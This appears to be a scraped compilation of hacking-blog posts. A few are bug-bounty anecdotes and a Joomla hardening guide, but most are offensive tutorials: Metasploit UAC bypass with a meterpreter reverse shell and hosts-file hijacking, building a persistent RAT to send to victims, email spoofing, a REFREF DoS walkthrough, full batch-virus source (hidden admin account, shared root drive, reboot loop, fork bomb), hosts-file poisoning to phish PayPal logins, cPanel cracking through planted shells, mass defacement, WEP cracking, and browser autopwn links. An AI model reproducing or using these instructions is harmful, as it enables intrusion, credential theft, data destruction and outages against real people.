ifixit.com Stored XSS Vulnerability

Well, it has been a long time, since i haven't posted any thing, i was a bit busy with my university exams, However, finally i managed to get some time to write something, Today i am sharing some of the vulnerabilites i found inside a popular website named "ifixit".

I found two XSS one was a Stored XSS and a second one was a Self XSS, However the Self-XSS could have been easily exploited by Clickjacking techniques as the page did not contain X-Frame options, Therefore the Self-XSS was also considered.
I have created a short POC of the Stored Cross Site Scripting vulnerability (XSS), I hope you enjoy it:

iFixit Stored Cross Site Scritping [Video POC]:

iFixit Self-XSS POC

For the above vulnerabilities, i was listed inside ifixit.com's responsible disclosure page:

Along with it, they also sent me two T-Shirts, some stickers and a 54 bit driver toolkit:

D.N.S. poisoning using metasploit.

Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.

(1)Hack remote p.c .(How to hack Remote P.C.?)

(2)Now we will Bypass U.A.C. protection of windows.

(3)Open Terminal & type following code in terminal

msfconsole

use exploit/windows/local/bypassuac

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4)Now we will edit host file.

msf >use post/windows/manage/injet_host

msf post(injet_host) >set domain www.google.com

msf post(injet_host) >set ip Your Desired I.P.

msf post(injet_host) >set session 2

msf post(injet_host) >exploit

This will Redirect google.com in victim p.c to your desired I.P.

How to use R.A.T. through S.E.T?

RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).

(1)Open your terminal & type

cd /opt/set

./set

(2)update your set

(3)Now select option 3 which is Third party Modules

(4)Now select option 2 which is RATTE (Remote administration tool tommy edition).

(5)Enter I.P. Address of your computer to connect back

(6)Port RATTE Server should listen on [8080]: press enter

(7)Should RATTE be persistent [no|yes]?:yes

(8)Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe

(9) Payload has been exported to src/program_junk/ratteM.exe

(10)Now send your ratteM.exe files to victim, as soon as they download and open it

Start the ratteserver listener now [yes|no]:yes

(11)chose 1 option which is list client

(12)if the payload been executed successfully, then you will see a new session and the client details. Note down the session number. Enter the session you want to interact with:press 0 here

Now choose option2 “activate client”

Now you get menu with lots of menu. Select 1st option which is start shell.

Hackers Get Your Team Ready - CTF 365

When it comes to infosec industry we all know that practice is the best way to learn how to defend and protect your system and more important how to find vulnerabilities and flaws within the systems you are after. This is a never ending training and the way you can do it most intensely and extensively is on CTF competitions. 

Today's CTF are becoming more and more complex and engaged. You can find from level based CTF's where you have to pass a level in order to get access to the next, up to more sophisticated systems that mimic different scenarios like internet bank phishing, to complex money laundering scenarios up to attack and defend games where each team get a server full of vulnerabilities or flaws and teams have to patch it while other members exploits the other teams servers.

Any good thing comes with bad things too. Beside their value as an alternative to infosec training labs, there are also some cons. CTFs are held yearly, spread it all over the world, held for short period of time, far from the real world internet (e.g. no DoS or DDoS attacks allowed). Most of them fall into oblivion, even though they are fun.

We at CTF365 decided to change CTF competitions for the better and we promise to blow your expectations. We'll simply build an internet within The Internet where everything will be possible. Well, almost everything. Routers, switches, networks, DoS or DDoS attacks, you name it.
CTF365 is World of Warcraft for Hackers except that instead of fighting in a fantasy world, with imaginary powers against imaginary characters, CTF365 will replicate the real world as much as possible, and you will have to fight with your own real tools... hacking tools. 

BackTrack, Metasploit, Nmap, BackBox Linux or whatever you choose to use as weapons. You will have your own Fortress (your own server) to defend, with your own network, routers, and switches. You will build your own team and we will provide you with RTTK – Red Team Tool Kit for team communication and many more features. There will be as few rules as possible trying to get to the perfect cyber wargame: No rules at all.

CTF365 will provide the infrastructure VPS included.

This is CTF365 team's goal. To create an internet within the real internet, a place where everybody can hack others machines while protect their own and become better and better in their day-to-day trainings.

CTF365 will test the teams for both defensive and offensive skills and its goal is to make players to become better at what they love to do most; offensive and/or defensive security. Having a place full of different kind of systems give players the opportunity to feel like in real life when you don't know what it'll be around the coroner.

As a system administrator you and your team can experiment new configurations without the fear that something wrong can happen or you can simply train your skills to protect your system. CTF365 is the ultimate testing field for servers administrators and pentesters.

How to install & configure send mail in Ubuntu?

Send mail is program which will help you to send email through command, you can send email from terminal or CMD . In this program we use our machine as a server. I will show you how to install & configure Send-Mail. So we can spoof email to targets. But problem is that this email is detected as spam due to automatic sending through machine.

How to Install Send-Mail?

Open terminal & type following command in terminal.

sudo apt-get install mailutils

sudo apt-get install sendmail

How to configure it?

After installing sendmail , you should configure sendmail. It`s little hard. But don`t worry after that we can spoof email to anyone.

Type following command on terminal

sudo gedit /etc/mail/sendmail.mc

It will open sendmail.mc file.

For example your last two lines are as follow

MAILER(`local')dnl

MAILER(`smtp')dnl

Put this code before that two lines.

MAILER_DEFINITIONS

define('SMART_HOST',`smtp.gmail.com')

Ok. now close that file

Now we will generate configure file from .mc file so type following command in terminal.

sudo bash -c 'cd/etc/mail/ && m4 sendmail.mc >sendmai.cf'

Now everything is complete, try to send mail using terminal or use Social Engineering Tool-Kit as i mention in previous post.

How to send mail through Command?

open terminal and type following command.

telnet 127.0.0.1 25

HELO server

MAIL from:sender`s email address

RCPT to: Recipient address

DATA

Subject:Test mail

from: sender`s email address

to: receiver`s address

Test Mail

.

quit


Now check spam folder of receiver`s email , you got email . Now check show original option of email , you can see that i.p. of computer , o.s. , many other things.

How to install social engineering toolkit(S.E.T.) in ubuntu?

Social Engineering Tool kit is cool tool which came with BACKTRACK, this increase power of metasploit. If you are on any linux system other than BACKTRACK , then you can install it .

Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.

Extra package which is necessary to use SET effectively are as follow.

(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu here.

(2)Ettercap:- If you are on any network & want to attack on network like Man in the Middele Attack or DNS poisoning then you require it.

To install Ettercap open terminal in type following command:-

sudo apt-get install ettercap

(3)Openjdk-6-It`s necessary program to use SET. Just type following command in terminal

sudo apt-get install openjdk-6-jdk


Now open terminal & change directory to opt.

sudo bash

cd /opt

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

cd /opt/set

svn update

nano config/set_config

Now we will configure it. First it require metaspolit path . So we will put it on configure file. Here comes problem , in first step we install metasploit , it`s directory is opt/metasploit-4.4.0/msf3. But when we put this path in configure file it cannot detect metasploit . So we have to rename metasploit-4.4.0 to framework3. So rename metasploit-4.4.0 folder name to framework3.

Put opt/framework3/msf3 this path in config file. Save it.Type in terminal.

./set

It will open SET .

In next tutorial I will show you how to configure sendmail & use it in set.

I Know I cannot explain good, So if you face any problem please mention in comment.

Updated:This article was written when S.E.T. use SVN. Now it`s move to github. So please click here to new installation method.

The Story Behind, How The Data Was Stolen

No one likes to hear the bad news that their computer, email, or phone has been hacked and the data stored in it has been plundered by cyber criminals. And hearing this news during the end of the year with Christmas approaching can only be the Grinch’s cherry on top to a year of disastrous security failures. But the sad fact is many more people are being faced with this problem as Grinch-like hackers continue to steal data on an increasingly significant basis. We may think that we are safe from the problem but in reality we are right in the midst of it, with internet giants coming under the radar as well!

Armed with keyloggers, Trojans, backdoor exploit methods and whatnot; these Grinches are pulling for the grand finale as 2012 comes to a close. Of course, this means that the data Industry has been lacking some major incentives and preventive measures that allowed these criminals to slip in between the cracks and make off with our data. The data breach investigations report is a pictorial representation of the actual scenario; read it to figure out the happenings.

Source: MobiStealth.com

PayPal Pays Me A Total Bounty Of 10,000 For The Command Execution Bug

                  
Recently, I wrote about the command execution vulnerability i found in Paypal for which they sent me an initial payment of 5000$, This story was featured in lots of popular technology blogs like Softpedia, ProPakistani, MyBloggertricks etc. Recently i received an email from Paypal, where they informed me that they have deposited the remaining bounty "4750$" to my business partners Paypal account.

I would also like to let you know that, still more than 20 bugs i sent are being validated by Paypal. 

Mohammad Chose Blogging, I Choose Hacking

Well, this post is not an ordinary one that talks about "Making Six Figure Income Online" or making millions from blogging, it rather contains some interesting piece of advices for Novice Bloggers and also the Ninjas out there who are struggling hard to survive online. It all started, when Mohammad and I met back in 2009 in a Snooker Club. We both were interested in blogging and Internet Marketing, so we therefore had arranged a meeting in order to share our existing blogging strategies.

Read More about the whole story on Mybloggertricks "Mohammad Choose Blogger, I Choose Hacking".

Download Free E-books about Hacking

Hello guys, if you want to learn more about Hacking & Computer Security ,i uploaded below eBooks on dropbox.Download link is in end.

List of Books are as follow.

(1)CEH(Certified Ethical Hackers)2010V6.

(2)Hacking Wireless Networks For Dummies.

(3)H gray hat hacking.

(4)Blind_SQLInjection.

(5)backtrack-4-assuring-security-by-penetration-testing.

(6)Collections of Ankit Fadia Hacking Book.

(7)Secrets of Reverse Engineering.

(8)Social Engineering toolkit

(9)Ethical Hacking and Countermeasures- Web Applications and Data Servers.

New books Added

(10)CSRF attack & Defense

(11)Armitage guide

(12)Pass-the-hash attacks: Tools and Mitigation

(13)HACKING: THE ART OF EXPLOITATION

(14)XSS Attacks - Exploits and Defense

(15)Seven Deadliest Network Attack 


Download link:- Please click here.

How to use REFREF?

As we know in past , famous Hacktivist group Anonymous carried out series Of DDOS attack in number of websites like paypal ,master-card ,visa. At that time they used tool LOIC for down the website.

Although they got success in their project ,but due to LOIC some of hackers arrested later. So they decide to build new weapon for DOS attack.

It was REFREF. It is programmed in perl ,java ,python.But main requirement is URL must be vulnerable to SQL injection. It mean if you found website which is vulnerable to SQL injection , then by using this tool you can easily down website.

You can Download REFREF SCRIPT from here.

How to use?

It`s pretty simple. Just open terminal change path & Execute script.

cd Downloads

perl refref.pl vulnerable URL

It will down website in short time. This tools is very effective , 17 second attacks from single machine resulting down 42 min outage on pastebin.

Batch File Virus -4

@echo off

cd\

cd %SystemRoot%\system32\

md 1001

cd\

cls

rem N0 H4rm 15 cau53d unt1| N0w

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000

echo 12:00:00.00 | time >> nul

echo 01/01/2000 | date >> nul

net users Microsoft_support support /add

rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.

net localgroup administrators Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001

echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >

%SystemRoot%\system32\1001\warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )

mode con rate=1 > nul

mode con delay=4 >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y

@ 12:01 and 12:02

at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>

nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5

copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All

Users\Start Menu\Programs\Startup\warnusr.vbs”

rem

***************************************************************************

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y

echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha....! ” > %systemroot%\system32\1001\sd.bat

copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat

“%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”

rem

***************************************************************************

cd\

cls

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r

cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\

attrib +h +s +r warnusr.vbs

attrib +h +s +r sd.bat

cd\

cd %systemroot%\system32

attrib +h +s +r 1001

rem K1||5 th3 3xp|0r3r.3×3 Pr0c355

taskkill /F /IM explorer.exe

rem @ EOV // End of Virus

Copy the source code and paste it in a notepad, then save it with the .bat extension. This virus program will begin its operation at C:\windows\system32 and creates a new directory with name '1001', changes the time to 12:00 and date to 01-01-2000, then creates a new user with account name 'Microsoft_support' with a password 'support' matching the account.

It automatically assigns administrator rights to the user account that was created, then shares the root drive 'C:' which really is a security issue making the system completely vulnerable. It will create a VBScript file with name 'warnusr.vbs' that is used to display a message 'Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or

Press No to Ignore the Virus', that really seems to be coming from the operating system itself, then it will change the keyboard setting by reducing the rate and delay time. Since the time and date has been already modified by the virus, it will automatically pop up a message stating 'You are requested to restart your Computer Now to prevent Damages or Data loss' exactly at 12:01 and 12:02, if the user restarts the computer, then it’s gone.

Whenever the user try to login to the computer, it will automatically reboots continuously, because the command 'shutdown -r' is set with time 00, and kept in start-up folder, the user has nothing to stop this unless he enters in safe mode and delete the file, more over the file is set with system and hidden attribute making it invisible.

The only way to stop this is to enter in safe mode and disable the start-up items, and then delete the file that reside in C:\windows\system32\1001 and in the start-up folder.

You can also use some exe-binders to bind this virus with any audio, video, text or whatever the files may be, then use some social engineering technique to make the victim execute the file by himself to harm his/her computer.

You can create this virus without using any third party tools in windows, also instead of exe-binder, you can use the ‘iexpress’ wizard to create a custom package.

Batch File Virus -3

Most of them have heard about the word ‘fork()’, which is used to create child process, like wise fork bombing is nothing but calling a program by itself again and again with a infinite loop and making the system to crash by popping up hundreds of windows on the screen.

@echo off

:loop

Explorer

Call fork.bat

Goto loop

Copy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling the program itself again and again until the system crashes or hangs up.

WOW! Paypal Sends Me 5000$ For A Command Execution Vulnerability

Update: 5000$ was the initial payment, Paypal payed another 5000$ which makes the total bug bounty of 10,000$ for the command execution vulnerability - 

PayPal Pays Me A Total Bounty Of 10,000 For The Command Execution Bug

Today when i logged into my Gmail account, I saw Paypal sent me 5000$  for my command execution bug i reported on one of it's subdomains, That's constituted a huge risk to the organization, since an attacker could have easily managed to execute any command on the server. Therefore the bug was extremely critical, however Paypal took more than 2 months to sort it out.
I cannot write more about the vulnerability per the terms of the bug bounty program.
Along with the command execution vulnerability, i was paid 500$ for an XSS vulnerability that i found on Paypal main domain, further more i was also paid for an information disclosure. So in total they sent me an amount of 6000$.

More than 20 of my bugs are still being validated by paypal.

Last week, i was offered by Paypal for a job as a Senior Pentester A.K.A SecurityNinja. kindly look at the screen shot below:

Cracking Cpanel Passwords [Tutorial 2]

One of our guest authors already wrote a post on "Cracking Cpanel passwords", however that method worked for some sites and did not work on others, However, recently avinash mailed me a guest post, which contained two working methods that can be used to crack a Cpanel passwords, I have tested both methods myself and they are working. However, for this method to work, The website on which your shell is uploaded should be already vulnerable to Symlink Bypass (Server Bypass).

Method 1 [Cracking CPanel Passwords]

Requirements:

1. PHP Backdoor (Shell) installed on a server.
2. Required Files

First create two folder's, Im creating abc & xyz Now i will upload the files to do symlink and do the symlink, Next give 0755 permission to jaguar.pl and run it and put etc/passwd in it, After this will get all the config's now you are done with symlinking the server

 Now go the second folder we created and upload B_F.php and place tour symlink folder link in that And then click on start And you have you cpanels's.

ScreenShots For Furthur Explanations

Method 2 [Cracking CPanel Passwords]

Requirements:
1. Shell On The Server
2. Cpanel.py
3. Python already installed on your server.


We have to run the script from command prompt, So therefore we need to create a directory with any name let's say "a" in this case.

How to run the script?

Open command prompt and navigate to the directory where you have placed the script.

Then type cracker.py ww.site.com/abc (this will be our symlinked folder link) c:\a ( this is where it will be saved and then press enter. It will start it's work.

Next It will give you a passwords copy them all and upload a cpanel bruter and paste all the passwords in pass area, For user's go to shell and give command

ls /var/mail

And you will get all usernames paste it in user's area, And click on start.

ScreenShots For Furthur Explanations

About the Author:
Avinash is a security researcher and a blogger. He runs a blog http://www.hackerzadda.com/, where he writes about hacking.

Batch file virus -2

Batch program offers its programmers to create their custom viruses just by misusing the way the command works, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark-side of the batch by learning how to misuse commands to create batch viruses.

Folder Replicator Virus:

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd\

cd C:\Documents and Settings\username\Desktop

:loop

md Virus

cd Virus

goto loop

2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.

Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code.

Secure Joomla From Hackers

Recently we wrote an article on "Wordpress Mass Defacement Tool "and On "Securing Your Wordpress from being Hacked', However I was requested by one of our readers to write an article on securing joomla blog from hackers and preventing it from being hacked, Joomla just like wordpress is a very widely used CMS platform, Joomla itself is quite secure by default, However the extensions are developed by common developers and most of them have no proper knowledge about security.

Now a days, it has been observed by me that most the hackers do not target vulnerable joomla extensions or joomla itself, however they target websites on the same server and use them to extract the configuration file of joomla that contains the database information. This vulnerability is commonly known as Symlink bypass in the black hat community and Server bypass in our white hat community. So in this article i will talk about the common methods to secure a joomla from hackers and preventing it from being hacked.

Secure Joomla From Hackers [Common Methods]

Choose A Secure Password

Joomla uses MD5 for generating password hashes, Though MD5 hashes are prone to some weaknesses, However Joomla makes them secure by adding a salt to it. Here is how a joomla hash looks:

4e9e4bcc5752d6f939aedb42408fd3aa:0vURRbyY8Ea0tlvnTFn7xcKpjTFyn0YT

The first part represents the MD5 hash and the part after the colon represents the Salt, This adds up an extra layer of security to joomla passwords, However these hashes can still be cracked with some softwares like PasswordsPro and OCIhashcat plus, Moreover now a days Graphic cards are being used for password cracking that makes the job much easier and take very little amount of time. For a good guide on choosing strong passwords, Kindly refer to my article "How To Create A Strong Password".

Securing Admin Panel

It's not a good idea to leave your admin panel open for the normal users, it should be only accessible by administrators. Imagine if an attacker has managed to extract your database information using SQL Injection, he would surely need the admin panel to log in, If you hide the admin panel, he won't be able to access it.

You can do it either by using changing blocking access to the Public_html/Joomla/Administrator directory and making it accesible by only your IP by modifying the .htaccess with the following commands:

Order Deny,Allow 
Deny from all
Allow from Your IP Address 

Alternatively you can use a extension called Jsecure, It protects your admin panel by generating a Key, which is only known to you, So the administrator panel can only be accessible if you would have the proper key.

Update Update And Update

Most of the time the vulnerabilities are found within Joomla itself and you have very little time to update your blog, or else you end up getting your blog hacked. I recommend you to subscribe to a exploit database 1337day.com and exploit-db.com, Most of the exploits go public there, So when ever you would see a vulnerability inside joomla, You would have plenty of time to update. I keep an eye on Bugtrack and seclist.org so whenever a vulnerability goes public, I am able to get information regarding it.



Scanning For Vulnerable Plugins Extension

As i mentioned at the beginning of the article that webmasters install joomla plugins/extensions without checking it, if they are vulnerable. You should periodically check exploit databases, if the extensions you are using are vulnerable to any of the attacks. It would be a hassle, to check for every extension if they are to any of the attacks. Alternatively, a tool named "joomscan" has made the life easier, It is periodically updated with lots of new vulnerabilities, it checks your website for common vulnerable extensions and report them to you.





Protecting From Shell Uploads

Once an attacker gains access to your administrator panel, He will usually upload a PHP backdoor to maintain access to your website commonly known as "Shells" in the black hat community, All you need to do in order to protect the Shell upload is to protect the change the permissions of the images directory to 400. Which will make the whole directory non writable. This will prevent hackers from uploading the shell and also from penetrating further.

An attacker can alternatively try to upload the shell via your FTP, so you should also make sure that you disable port 21/ Disable FTP access.

Securing From Symlink

Symlink bypass is one of the most commonly used attacks, Even if your joomla website is completely secure, it's still possible for an attacker to extract your configuration files "Configuration.php" which contains database username and password via an attack called Symlink bypass. In order to protect your configuration.php, you need to change the permissions to 400.

You can do it by applying the following command:

CHMOD 400 Configuration.php
Protect From Mass Defacement

Lots of time it happens that hackers manage to gain root access to the server on which your joomla blog is hosted, In these cases the attacker runs a Mass Defacement tool/script, which changes the index files of all the websites running on the server, In order to protect your blog from mass defacement attack, All you need to do is change the permissions of index.php to 400. However, this does not provide complete protection, because the once the hacker has root on the server, he can manually change permissions of your blog, hence defacing your website.

I hope you have liked my post on "Secure Joomla From Hackers". Though there is lot left, but i have highlighted important steps in order to protect your website from being hacked.

DNS poisoning using BATCH File

Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises of a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted craps from your computer and even for creating a batch VIRUS.

DNS poisoning:

Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials.

1. Just open up a notepad, copy and paste the below code

@echo off

echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt

echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt

exit

2. Save it as a batch file with the extension .bat

3. Then run it on the Victims computer to infect it.

4.This program creates a new entry in the hosts file, so that whenever an user attempts to move to www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.

How to scan web-server with Nikto?

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

Nikto is a tool that it has been written in Perl and it can perform tests against web servers in order to identify potential vulnerabilities

 Download Nikto from here.

 Open terminal & extract it in folder

 Then change directory, type following code in terminal

    cd Downloads/nikto-2.1.5

 Make nikto.pl file exectuable(right click on file, & make it executable)

 Update it by typing following command

    ./nikto.pl -update

 Now final step to scan webhost type following in termina

   ./nikto.pl -host I.p

Wordpress Mass Defacement Tool

Wordpress as being one the widely used CMS platform is one the favorite target of hackers now a days along with WHMCS, Instead of directly targeting wordpress fucntionalities and vulnerable plugins, it has been observed that the hackers are targeting a vulnerable website on the same server and using it they are able to bypass server restrictions in order to get the configuration file and hence hacking in to the wordpress. This method is commonly known as Symlink Bypassing in Black Hat World and server bypassing in White hat community.
Now it's a difficult task for an attacker to manually connect to the database and then manually replace the index file of worpdress for a successful defacement. Therefore hackers use Mass defacers. These are tools used by hackers to change the index files of all the websites present on the server with their own defacement page, This usually happens when the hacker has root level access on the server.

Recently, The admin of Team Root "Mauritania Attacker" mailed me his tool for the review, Which can be used by attackers to deface all the wordpress websites present on the same server.

How Does It Work?

For this tool to work the only requirement would be that the server is vulnerable to symlink bypass, This tool will automatically symlink all the wordpress websites on the server and replace their indexes with the page you will provide (.html or .PHP).

How To Use It?

The usage is extremely simple and i really don't see purpose of creating a tutorial, however this blog is mostly read by newbies, So I will add some screen shots.

Requirements

1. Shell On The Server
2. The shell should not be secured from Symlink Bypassing.
3. Wordpress Mass Defacement Tool

Once you have completed all the above requirements, Just upload the Mass Defacement tool to the webserver, it will look some thing like this, Now replace the contents of index url with your own defacement page.

Next you will see the results for the websites, yo have been able to deface:

And finally you can view the list of all the websites, you were able to deface:

How To Protect Your Self?

In order to protect your website from being defaced, All you need to do is to change the permissions of your index files to 400. So no one will be able to change them, however if an attacker has root level access on the server, there is no way of protecting your website, since the attacker can manually change the permissions. 

How To Hack HTTP Passwords With Wireshark

Most of the websites on the Internet use HTTP protocol for comunication which runs on Port 80, The data send to the server is Un-encrpypted and goes in plain text. If you are using HTTPS (Port 443), The data will be send to the server encrypted. When ever you enter the data in a Form, Your browser either sends a POST Or Get Request to the webserver, In most cases you will see POST method used in forms. Now most of the websites on the internet use Http protocol for the authentication, which enables an attacker on the local area network to sniff every thing that goes through that form, That's the reason why you see websites like Paypal, Ebay, Gmail with https.


In this tutorial, I will show you how a hacker can hack passwords sent via http to the server with wireshark. Wireshark is a network analysis tool used to capture and analyze all the packets being send from your computer to the server.

Attack Scenario

Let's suppose that you went to starbucks to have a coffee with your friend, You have connected to the wifi hotspot, An attacker comes in and starts wireshark and captures your HTTP Post passwords and therefore compromising your security.

How To Hack HTTP Passwords With Wireshark

Before, you i show you how to hack http passwords, i would like to let you know that for a successful capture, your network card should be in Promiscuous mode, which will enable to capture all the traffic going through your network.

Step 1 - First of all download wireshark from the official website and install it on your computer.

Step 2 - Next open up wireshark click on analyze and click on interfaces at the top.


Step 3 - Next choose the appropriate interface and click on start. Wireshark would start sniffing the network.

Step 4 - Continue sniffing for around 10 minutes. Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

In the mean time, Log into any website (For Testing Purposes), having http Authentication.

Step 6 - Next set the filter to http.request.method == "POST", This will enable it to capture all the HTTP Post request going through your computer. Start analyzing the packets and locate the website in which you logged in having http authentication.

Step 7 - Next click on Follow TCP stream. You will see the username and password that you entered. In this particular senario i logged in my wordpress account, where i entered the username:admin and password:rafayhackingarticles, Since wordpress uses http for authentication, The data that was entered was successfully captured.

Countermeasures

The best countermeasure would be to use a VPN, so that all the traffic would be encrpyted.

You Might Also like:

• Hack A Facebook Password With ARP Posinoning

how to Browser Autopwn attack in metasploit?

In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.

In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.In the next image you can see the available options and default settings for this module.

We will set up the LHOST with our IP address,the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.

After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.

Now we can share the link through our email to our client employees.If any user opens the malicious link,the autopwn module will try all these exploits in order to see if it can break into the client.If the browser is vulnerable to any of these exploits meterpreter sessions will open.

Browser based attacks are not stable.This is because browsers can crash which means that the meterpreter session or the shell access will lost.For that reason the metasploit will try to migrate with a another process more stable as soon as possible.

How to crack wi-fi password in ubuntu?

For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s

(1)install aircrack

sudo apt-get install aircrack-ng

(2) You need to go in root first. For this purpose type “su –“ and type your password.

(3)now type following command in terminal

Code:

# iwconfig wlan0 mode monitoring

Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

(4)After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:

Code:

# airodump-ng wlan0 

(5)Once you’ve found one, abort the process with Ctrl+C. Now when we have got our target it’s time to collect some information about the network. First of all copy the MAC Address of the access point which stands for BSSID (should look something like 00:15:EB:E7: …). Another thing is that we need to know the channel it’s currently working on (could see that under CH – e.g. 6). So let’s gather our information with airodump-ng.

Code:

# airodump-ng –w wep –c 6 –bssid 00:15:EB:E7: … wlan0 

(6)Now we need to open another terminal in which we will use ARP Reply attack to increase the amount of data packets and gather the initializing vectors or IV of the earlier chosen Access Point.

Code:

# aireplay-ng -3 –b 00:15:EB:E7: … wlan0 

(7)Let’s go to terminal 1 again and have a look at the data packets. We need to have collected over 20 000 packets. If so abort both airodump-ng and aireplay-ng.

Now we have everything required to decode the key of the wireless network. We do that with aircrack as shown below:

Code:

# aircrack-ng wep-03.cap 

Then you should see that the key has been decrypted 100% successfully and the key itself.

How to exploit VSFTPD ?

VSFTPD, which stands for "Very Secure FTP Daemon"[1], is an FTP server for Unix-like systems, including Linux.

VSFTPD is an FTP server that it can be found in unix operating systems like Ubuntu, CentOS, Fedora and Slackware. By default this service is secure however a major incident happened in July 2011 when someone replaced the original version with a version that contained a backdoor. The backdoor exists in the version 2.3.4 of VSFTPD and it can be exploited through metasploit.

So first we scan port 21 is it vsftpd 2.3.4 or not, for this purpose you can use nmap.

So let’s assume that we have scanned a host and we have discovered the version 2.3.4 of VSFTPD running on the system.

We can open the metasploit framework in order to search for the vsftpd module.

As we can see there is only one module that we can use. So we will start the configuring the module appropriately. In the next screenshot you can see the configurations that we need to do in this exploit in order to be executed successfully.